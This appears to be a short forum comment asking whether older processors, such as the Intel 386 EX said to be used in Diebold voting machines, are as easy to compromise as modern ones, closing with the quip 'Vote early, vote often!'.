> are they equally as easy to compromise as the modern versions?
If so, is the "Intel 386 EX" processor in Diebold voting machines vulnerable?
Vote early, vote often!